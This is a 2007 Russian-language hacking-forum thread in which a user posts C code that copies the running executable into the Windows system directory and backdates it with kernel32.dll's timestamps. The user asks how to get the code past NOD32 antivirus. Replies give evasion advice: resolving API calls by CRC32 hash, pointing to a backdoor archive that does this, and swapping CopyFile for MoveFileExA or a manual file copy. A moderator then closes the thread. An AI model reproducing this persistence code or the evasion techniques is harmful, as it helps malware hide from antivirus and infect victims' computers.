Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
CopyToSysDir() Помогите поправить |
02.07.2007, 20:25
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 107
Провел на форуме:
725870
Репутация:
208
|
|
CopyToSysDir() Помогите поправить
Функция копирует ехе процесса в системную директорию. Мой нод32 ее палит. помогите испарвить, чтобы не ловилась.
Код:
// ---------------- [ Copy to system directory ] -------------- //
int CopyToSysDir(char * szBuff)
{
char szExe[256], szNewExe[256], szSysDir[256], szKernl[256], szCurDir[256];
HANDLE hFile;
FILETIME aTime, bTime, cTime;
if ( GetModuleFileName(NULL, szExe, 256) == 0 )
return 0;
if ( GetSystemDirectory(szSysDir, 256) == 0 )
return 0;
if ( GetCurrentDirectory(256, szCurDir) == 0 )
return 0;
if ( (strcmp(szSysDir, szCurDir) == 0) && (strcmp(szExe, EXE_NAME) == 0) )
return 0;
lstrcpy(szNewExe, szSysDir);
lstrcat(szNewExe, "\\");
lstrcat(szNewExe, EXE_NAME);
if ( CopyFile(szExe, szNewExe, FALSE) == 0 ) // палится в этом месте
return 0;
lstrcpy(szKernl, szSysDir);
lstrcat(szKernl, "\\");
lstrcat(szKernl, KERNEL32_DLL);
hFile = CreateFile(szKernl, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
if ( hFile != INVALID_HANDLE_VALUE )
{
GetFileTime(hFile, &aTime, &bTime, &cTime);
CloseHandle(hFile);
}
else
return 0;
hFile = CreateFile(szNewExe, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
if ( hFile != INVALID_HANDLE_VALUE )
{
SetFileTime(hFile, &aTime, &bTime, &cTime);
CloseHandle(hFile);
}
else
return 0;
memcpy(szBuff, szNewExe, 256);
return 1;
}
|
|
|
02.07.2007, 23:13
|
|
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
Провел на форуме:
2009677
Репутация:
472
|
|
для начала убери прямой вызов апи, можешь использовать crc32
|
|
|
|
03.07.2007, 00:40
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 107
Провел на форуме:
725870
Репутация:
208
|
|
а можно с примером?
|
|
|
|
03.07.2007, 01:01
|
|
Постоянный
Регистрация: 27.08.2006
Сообщений: 367
Провел на форуме:
2009677
Репутация:
472
|
|
http://hellknights.void.ru/releases/el-backdoor-small-v0.02.rar
в нем реализован поиск апи по crc32, разбирайся
|
|
|
|
03.07.2007, 01:34
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 107
Провел на форуме:
725870
Репутация:
208
|
|
ок. спс.
а больше нету никаких способов изменить код, который палит антивирь? не обязательно тот, что я привел выше
|
|
|
|
03.07.2007, 01:44
|
|
Участник форума
Регистрация: 09.12.2006
Сообщений: 135
Провел на форуме:
426226
Репутация:
726
|
|
У меня MoveFileExA не палился.
Сейчас в лом опять NOD ставить, чтобы проверить и с установками экспериментировать.
|
|
|
|
03.07.2007, 03:05
|
|
Banned
Регистрация: 18.05.2005
Сообщений: 1,981
Провел на форуме:
1941233
Репутация:
2726
|
|
как понять палит? палит весь файл по ф-ии или его действия AMON файл-монитором?
ну скоипируй содержимое своего ЕХЕ в созданый в сис. дериктории файл
CreateFile(), WriteFile(), RedFile(), CloseHandle()
хотя, как видно, код ты просто скопипастил, непонимая что означает ни одна строчка.
|
|
|
|
03.07.2007, 10:34
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Блин, а ты как хотел? Конечно, палит.
Закрыто по причинам:
1) Ссылок дали достаточно. + еще дам: http://wasm.ru/
2) Блин, да задолбали темы как скрыться от АВ и фаеров. Думайте своей головой
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
